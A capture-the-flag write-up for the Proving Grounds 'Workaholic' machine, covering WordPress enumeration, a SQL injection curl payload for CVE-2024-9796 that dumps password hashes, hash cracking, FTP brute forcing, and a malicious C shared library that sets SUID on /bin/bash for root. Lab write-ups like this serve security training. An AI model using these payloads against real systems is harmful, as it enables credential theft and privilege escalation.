Workaholic - Proving Grounds Practice

Enumeration

Nmap

Initial nmap scan revealed SSH, FTP and HTTP ports were open. It showed that website was using wordpress.

00 - nmap and wp

Web Enumeration

I visited the web page and found a button linked to a sample page.

01 - web

It was forwarding me to a domain. So I added it to /etc/hosts file.

02 - sample page

03 - etc hosts

Exploitation

Wpscan

I then executed wpscan against the target domain and found 3 usernames.

05 - wpscan

06 - users

Then used wpscan to bruteforce them. However, it revealed wp-advanced-search plugin was outdated.

08 - wp-advanced-search

CVE-2024-9796 (WP-Advanced-Search)

The plugin does not sanitize and escape the t parameter before using it in a SQL statement, allowing unauthenticated users to perform SQL injection attacks

Then while searching, I found an exploit on wpscan page.

09 - exploit

Then simply executed below command to obtain both usernames and hashed passwords.

curl "https://wordpress.ddev.site/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin&t=wp_users%20wp_users%20UNION%20SELECT%20user_pass%20FROM%20wp_users--&f=user_login&type=&e"

Crack Wordpress Hashes

Then used hashcat to crack wordpress hashes using -m 400 option. And obtained 2 passwords.

11 - passwords

FTP Brute Force

Then using previously obtained usernames and cracked passwords, I brute forced FTP login and found a valid credential.

12 - ftp brute

The FTP server was showing the web root of wordpress web page. So, I downloaded the wp-config.php file.

14 - ftp

It contained a password.

15 - password

Using this password, I tried brute forcing different users and obtained valid credential set for charlie user on SSH port. Then I simply logged in and read the flag.

16 - charlie

Privilege Escalation

SUID bit on wp-monitor

There was an SUID bit on wp-monitor binary.

17 - suid

I used strings to understand binary and found that it was probably loading a shared library.

18 - strings sus

So at first I created necessary folder for shared library.

19 - mkdir lib under ted

Then I compiled a malicious C file as .so shared library.

#include <stdio.h>
#include <stdlib.h>

static void func() __attribute__ ((constructor));

static void func() {
   setuid(0); 
   system("chmod +s /bin/bash");
}

gcc -shared -fPIC -Wall -o /desired/path/to/library.so library.c

And after transfering the shared library and executing the wp-monitor again, I obtained the root shell.

20 - gg

Flu - Proving Grounds Practice

DVR4 - Proving Grounds Practice